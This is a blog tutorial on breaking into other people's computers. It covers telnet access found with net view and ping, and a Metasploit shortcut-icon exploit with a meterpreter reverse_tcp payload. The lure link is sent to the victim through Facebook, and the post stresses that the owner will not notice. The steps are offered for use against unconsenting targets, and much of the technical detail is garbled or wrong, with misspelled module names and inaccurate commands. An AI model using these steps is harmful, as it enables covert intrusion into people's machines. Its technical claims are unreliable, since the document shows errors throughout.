Skip to content Skip to sidebar Skip to footer

How to Hack Other People's Computers via CMD 2021

How to Hack Other People's Computers via CMD

How to Hack Other People’s Computers via CMD – Command Prompt or CMD which is usually defined as a DOS command that is delivered or written in text form.

This CMD has many benefits, one of which can be used to hack or break into other people’s computers.

But you also still need other facilities or assistance if you want to hack through this CMD.

One of the facilities that can be used is to use Telnet, because it is often used to remotely or computers in one network, namely through CMD.

In addition to CMD, we will also explain how to hack other people’s computers with a Linux terminal.

Therefore, take a look at our discussion on how to hack other people’s computers via CMD until it’s finished.

How to Hack Other People’s Computers via CMD

1. How to Hack Other People’s Computers via CMD with Telnet

How to Hack Other People's Computers via CMD
How to Hack Other People’s Computers via CMD with Telnet

As explained earlier, if you hack through CMD, then we will be facilitated by the telnet command.

Because this telnet command is similar to an automatic desktop command, but it is safer because the hacking process can be done remotely.

So that the victim or target will not know if their computer has been taken over.

As for how to hack other people’s computers via the latest CMD as follows:

  • For the first step, please check the telnet configuration on your computer by pressing the Windows key + R (click Run > type CMD and then click OK) and wait for DOS to appear.
  • Then check what computers are running, this is done to make sure whether the telnet function can be used or not by typing the command below:

-net view, check which network (host) is currently active.

  • Then also check which ports can be hacked into the PC or computer.
  • Please pay attention to the Foreign Address section, there you can get an open port with port 139, if that is the case then you can try to telnet with the telnet format (space) destination IP (space) Port:

telnet 192.168.16.66 139

  • Now go back to the telnet command to remote the target computer which is already connected to your computer and the method is the same as above.
  • Telnet 192.168.16.8 (enter), if successful, the display will appear as below:

C:Documents and SettingsAdministrator>net view

Server Name Remark

PC03 lpkid

SERVER

SERVER – 2003

The command completed successfully.

C:Documents and Settings Administrator>ping 192.168.2.22

Pinging 192.168.2.22 with 32 bytes of data:

Request timed ot.

Replay from 192.168.2.22: bytes=32 time<1ms TTL=128

Replay from 192.168.2.22 bytes=32 time<1ms TTL=128

Requests timed out.

Ping statistics for 192.168.2.22:

Packets: Sent = 4, Received = 2, Lost = 2 (50% loss),

Approximed round trip times in milli-seconds:

Minimum=0ms, Maximum = 0ms, Average = 0ms

C:Documents and SettingsAdministrator>telnet 192.168.2.22

Welcome to Microsoft Telnet Client

Escape Character is ‘CTRL+]’

You are about to send your password information to a remote computer in Internet zone. This might not be safe. Do you want to send anyway(y/n): n (enter, then enter)

Welcome to Microsoft Telnet Service

Login: ……..

password: ******

Welcome to Microsoft Tenet Server.

C:Documents and Settingsadmin>

  • Try doing an IP check to see if your computer is already on PC03 by typing the command below:

Welcome to Microsoft Telnet Server.

C:Documents and Settingsadmin>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 2:

Connection-specific DNS Suffix:

IP Addresses. . . . . . . . . . . . . . . . . . . : 192.168.2.22

Subnet Masks . . . . . . . . . . . . . . . . . : 255.255.255.0

Default Gateways . . . . . . . . . . . . . . . : ?

C:Documents and Settingsadmin>

  • Activate the telnet service first so that you can enter and all admins/clients can do the telnet. Now you can control the target computer you want to hack, for example restarting it remotely or something else.

2. How to Hack Other People’s Computers via CMD with Linux Terminal Remotely

How to Hack Other People's Computers via CMD
How to Hack Someone Else’s Computer via CMD with Linux Terminal Remotely

In addition to using telnet, we can also hack computers by using a linux terminal which is somewhat more complex in terms of hacking tools than in Windows XP 7, 8 and 10.

But to be able to do the hack process using this linux terminal, it must be done via a wifi network or the internet.

This is done so that the hacking process can be done remotely so that the computer owner does not know it.

The hack process by using the Linux terminal is also quite popular among hackers because they often use it.

Because it has complete tools such as Backbox, Kali Linux and others.

Meanwhile, how to hack someone else’s computer via CMD with a linux terminal remotely is as follows:

1. Open metasploit in linux terminal or backtrack

The method:

  • So that metasploit can be opened, of course you have to download it first.
  • Once downloaded, it can be run or used later. Then type the command “CD (directory location)” for example the location in cd c:metasploit and press enter.
  • Then type the next command which is sudo chmod +x (name of metasploit) then press enter.
  • Continue the steps by typing the next command, namely msfconsole then press enter.
  • Then type the command use
  • Then you type use exploit/windows/browser/ms10_046_shorcut_icon_dllloader

2. Knowing the IP address of the target computer

The method:

  • The next step is to find out the computer IP address of the hack target by typing

ifconfig

  • and the IP address will be visible.
  • Then type set srvhost (your IP address) and press enter then set lhost (your IP address). Then type set PAYLOAD windows/meterpreteer/reverse_tcp and hit enter to check if the process was successful or not.
  • Please type show options then exploit to get the IP URL, for example like the URL address http://192.???.??
  • Please send the url address via Facebook which will be the target of your hack, so that they click on the url address.
  • To find out if the hack target has clicked on the URL address, please type sessions -i and retype sessions -i 1.

3. How to get into someone else’s computer or hack target

Once you see which computers have clicked on your IP URL address, then the hack process can be done.

To start the hack process, please type shell sysinfo and you will see various directories or folders on the hacked target computer.

The final word

Several ways to hack a computer via CMD as explained above you can learn and try to apply.

However, it is recommended to use the hack method wisely, so as not to harm others.

It’s better to just make it a lesson or if you want to keep hacking, ask the computer owner for permission first.

Dody S.

Someone who likes to learn and share everything about technology.

Post a Comment for "How to Hack Other People's Computers via CMD 2021"